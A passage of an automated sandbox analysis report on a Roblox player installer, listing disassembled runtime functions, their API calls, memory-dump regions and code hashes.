                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f1a68532e7548a964922b4dcdfb938087b9172cc9c9e143692da4ab77be74bf7
                                                                              • Instruction ID: d6c64490f967803e629b03f4fe5271fa8bc3f928ef866293acb0f5b1069fd37e
                                                                              • Opcode Fuzzy Hash: f1a68532e7548a964922b4dcdfb938087b9172cc9c9e143692da4ab77be74bf7
                                                                              • Instruction Fuzzy Hash: 1701B1376243226FEB668E6DECC596A37AEEBC57607554120FE04DB18CFA30D8609790
                                                                              Function 0125B99B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 152 125b99b-125b9a6 153 125b9b4-125b9ba 152->153 154 125b9a8-125b9b2 152->154 156 125b9d3-125b9e4 RtlAllocateHeap 153->156 157 125b9bc-125b9bd 153->157 154->153 155 125b9e8-125b9f3 call 123e672 154->155 161 125b9f5-125b9f7 155->161 158 125b9e6 156->158 159 125b9bf-125b9c6 call 1259cb0 156->159 157->156 158->161 159->155 165 125b9c8-125b9d1 call 12625ed 159->165 165->155 165->156
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,?,0125A212,00000001,00000364,?,00000006,000000FF,?,01244464,0136C1C8,0000000C), ref: 0125B9DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: c44a9d9b3188628595fc3fbfc27e5107e0363062a2352d4875030ab7395b886f
                                                                              • Instruction ID: 0a2846a58f82a29b88ccf6680286c0e349321fd6fd71eff30d3e9034868f1926
                                                                              • Opcode Fuzzy Hash: c44a9d9b3188628595fc3fbfc27e5107e0363062a2352d4875030ab7395b886f
                                                                              • Instruction Fuzzy Hash: D0F0E9316752226BEBB25A6A9DC6B7B3B6EAF51671F044012EE05D6180CE30D8008FE0
                                                                              Function 0125A4EA Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 168 125a4ea-125a4f6 169 125a528-125a533 call 123e672 168->169 170 125a4f8-125a4fa 168->170 177 125a535-125a537 169->177 172 125a513-125a524 RtlAllocateHeap 170->172 173 125a4fc-125a4fd 170->173 175 125a526 172->175 176 125a4ff-125a506 call 1259cb0 172->176 173->172 175->177 176->169 180 125a508-125a511 call 12625ed 176->180 180->169 180->172
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000000,0124463C,0125A27F,?,01253C3D,0136C588,00000018,00000003), ref: 0125A51C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 5298accb8c98d3a8d7149d2afd8f81911df65b131b0ff4b5c4f1c4b3bd511a48
                                                                              • Instruction ID: ee00ea749a55c42795b0c70c9183fe27fd67e86a7296298c0659fa646a6a4be3
                                                                              • Opcode Fuzzy Hash: 5298accb8c98d3a8d7149d2afd8f81911df65b131b0ff4b5c4f1c4b3bd511a48
                                                                              • Instruction Fuzzy Hash: 47E0E5319712135BEBB126A97C86F6A3E8CEF513B5F0102209F8593080DF70C84086E1
                                                                              Function 01257A3B Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 183 1257a3b-1257a69 call 1233198 call 1257793 187 1257a6e-1257a73 call 1233175 183->187
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3
                                                                              • String ID:
                                                                              • API String ID: 431132790-0
                                                                              • Opcode ID: 6ea0add8e4209a41040599d14ab4d10730c7130b862a756bd77a225652edf212
                                                                              • Instruction ID: 1424044aee01f0d38c9aba5a657950d0f47d88a1bf81165c0f41d7ed08ed7a78
                                                                              • Opcode Fuzzy Hash: 6ea0add8e4209a41040599d14ab4d10730c7130b862a756bd77a225652edf212
                                                                              • Instruction Fuzzy Hash: 2AE092B6C5020EAADB00DFE4C485BEFBBBCBB18301F5044669245E7140EA7897858BE1

                                                                              Non-executed Functions

                                                                              Function 0125D13C Relevance: .0, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                              • Instruction ID: 9750b96efa1c064eb4fce50cceb8b9e88c01760cd01defa33bcef89a3c8af563
                                                                              • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                                              • Instruction Fuzzy Hash: FDE08C3292123CEBCB24DBDCC98499AF7ECEB44E00B114096BA01D3500D270DE00CBD0
                                                                              Function 012543AC Relevance: .0, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001432000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001451000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000014D9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015B6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015BC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000015C2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001626000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001628000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000167B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000016CC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000176F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000017C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001811000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001862000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000018B3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001904000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001955000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019A6000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.00000000019F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A49000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001A9A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000001AEB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000204E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.000000000208E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811497846.0000000002091000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3813683439.0000000002093000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_f40000_RobloxPlayerInstaller.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                              • Instruction ID: 2826aabbbcfacdf035e293b989aa3494b7197ed5a9ca01932dcd0571c328ac19
                                                                              • Opcode Fuzzy Hash: 825b0484f95f8aa3fa9de2913042429f620acb6fc0ba1aea453df1d5c0501ff0
                                                                              • Instruction Fuzzy Hash: 04C08C34021D8157CF6AAB1892F43B87355AB92682FA0299CCE034B653D63E99C3D600
                                                                              Function 01236350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _ValidateLocalCookies.LIBCMT ref: 01236387
                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0123638F
                                                                              • _ValidateLocalCookies.LIBCMT ref: 01236418
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 01236443
                                                                              • _ValidateLocalCookies.LIBCMT ref: 01236498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3810842072.0000000000F41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F40000, based on PE: true
                                                                              • Associated: 00000004.00000002.3810816667.0000000000F40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811161595.0000000001370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811196490.0000000001374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811323000.0000000001420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3811425855.0000000001428000.00000008.00000001.01000000.00000009.sdmpDownload File
